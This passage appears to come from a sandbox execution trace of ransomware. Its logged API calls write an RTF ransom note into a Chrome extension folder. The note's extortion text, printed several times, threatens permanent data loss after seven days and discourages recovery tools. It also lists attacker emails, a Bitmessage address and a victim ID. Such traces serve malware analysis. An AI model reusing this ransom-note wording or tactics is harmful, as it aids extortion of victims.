}}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.360] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.360] WriteFile (in: hFile=0x2e8, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.360] CloseHandle (hObject=0x2e8) returned 1 [0289.360] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\#readme_eman#.rtf")) returned 0xffffffff [0289.361] GetLastError () returned 0x2 [0289.361] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 